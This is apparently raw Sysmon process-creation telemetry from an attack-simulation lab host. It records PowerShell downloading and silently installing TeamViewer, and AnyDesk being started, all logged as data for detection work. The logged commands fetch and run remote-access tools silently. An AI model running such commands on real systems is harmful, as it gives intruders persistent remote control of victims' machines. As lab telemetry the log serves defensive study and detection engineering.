\""C:\Users\\"" + $env:username + \""\Desktop\AnyDesk.exe\"" Start-Process $file1 /S;}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-37D7-6304-8D0B-000000006602}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030471250Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:07.886{C2494F38-4EE7-6304-B20E-000000006602}6024C:\Program Files (x86)\TeamViewer\TeamViewer.exe15.32.3.0TeamViewerTeamViewerTeamViewer Germany GmbHTeamViewer.exe"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" C:\Users\Administrator\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=A098DE90F4B56D5ACA114D54A7C24CBD,SHA256=CFAE51C1FB2C51EA70A2C4244D84C9375C020CF2BCFDBD12FA0D313B4B2FB834{00000000-0000-0000-0000-000000000000}7760--- 154100x800000000000000030466622Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:51:52.461{C2494F38-4ED8-6304-A50E-000000006602}7448C:\Users\Administrator\Desktop\TeamViewer_Setup.exe--TeamViewerTeamViewer Germany GmbH-"C:\Users\Administrator\Desktop\TeamViewer_Setup.exe" /S C:\Users\Administrator\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=91968EEEB0848718FDF2882C3F9164F2,SHA256=45DC9F4A5A19E6DE06C27FF0BFBF864EBDDF2C225BCDDD72E202BCD22EFC5963{C2494F38-4EA6-6304-9B0E-000000006602}7760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe $file1 = \""C:\Users\\"" + $env:username + \""\Desktop\TeamViewer_Setup.exe\"" Start-Process -Wait $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030465327Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:51:02.860{C2494F38-4EA6-6304-9C0E-000000006602}7520C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{C2494F38-4EA6-6304-9B0E-000000006602}7760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe $file1 = \""C:\Users\\"" + $env:username + \""\Desktop\TeamViewer_Setup.exe\"" Start-Process -Wait $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030465320Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:51:02.856{C2494F38-4EA6-6304-9B0E-000000006602}7760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe $file1 = \""C:\Users\\"" + $env:username + \""\Desktop\TeamViewer_Setup.exe\"" Start-Process -Wait $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-37D7-6304-8D0B-000000006602}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030449990Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:32:32.384{C2494F38-4A50-6304-0A0E-000000006602}9792C:\Users\Administrator\Downloads\AnyDesk.exe7.0.14AnyDeskAnyDeskAnyDesk Software GmbH-"C:\Users\Administrator\Downloads\AnyDesk.exe" --show-settingsC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=2621B754576047A6E94ACBF1DD4FE0EF,SHA256=109B03FFC45231E5A4C8805A10926492890F7B568F8A93ABE1FA495B4BD42975{C2494F38-F593-6303-B600-000000006602}2220C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -EmbeddingWIN-HOST-MHAAG-\Administrator 154100x800000000000000030446866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:32:10.511{C2494F38-4A3A-6304-010E-000000006602}9100C:\Users\Administrator\Downloads\AnyDesk.exe7.0.14AnyDeskAnyDeskAnyDesk Software GmbH-"C:\Users\Administrator\Downloads\AnyDesk.exe" --local-controlC:\Users\Administrator\Downloads\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342MediumMD5=2621B754576047A6E94ACBF1DD4FE0EF,SHA256=109B03FFC45231E5A4C8805A10926492890F7B568F8A93ABE1FA495B4BD42975{C2494F38-4A39-6304-FF0D-000000006602}8864C:\Users\Administrator\Downloads\AnyDesk.exe"C:\Users\Administrator\Downloads\AnyDesk.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030446856Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:32:10.508{C2494F38-4A3A-6304-000E-000000006602}6128C:\Users\Administrator\Downloads\AnyDesk.exe7.0.14AnyDeskAnyDeskAnyDesk Software GmbH-"C:\Users\Administrator\Downloads\AnyDesk.exe" --local-serviceC:\Users\Administrator\Downloads\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342MediumMD5=2621B754576047A6E94ACBF1DD4FE0EF,SHA256=109B03FFC45231E5A4C8805A10926492890F7B568F8A93ABE1FA495B4BD42975{C2494F38-4A39-6304-FF0D-000000006602}8864C:\Users\Administrator\Downloads\AnyDesk.exe"C:\Users\Administrator\Downloads\AnyDesk.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030446282Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:32:09.737{C2494F38-4A39-6304-FF0D-000000006602}8864C:\Users\Administrator\Downloads\AnyDesk.exe7.0.14AnyDeskAnyDeskAnyDesk Software GmbH-"C:\Users\Administrator\Downloads\AnyDesk.exe" C:\Users\Administrator\Downloads\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342MediumMD5=2621B754576047A6E94ACBF1DD4FE0EF,SHA256=109B03FFC45231E5A4C8805A10926492890F7B568F8A93ABE1FA495B4BD42975{C2494F38-0593-6304-C702-000000006602}4720C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"WIN-HOST-MHAAG-\Administrator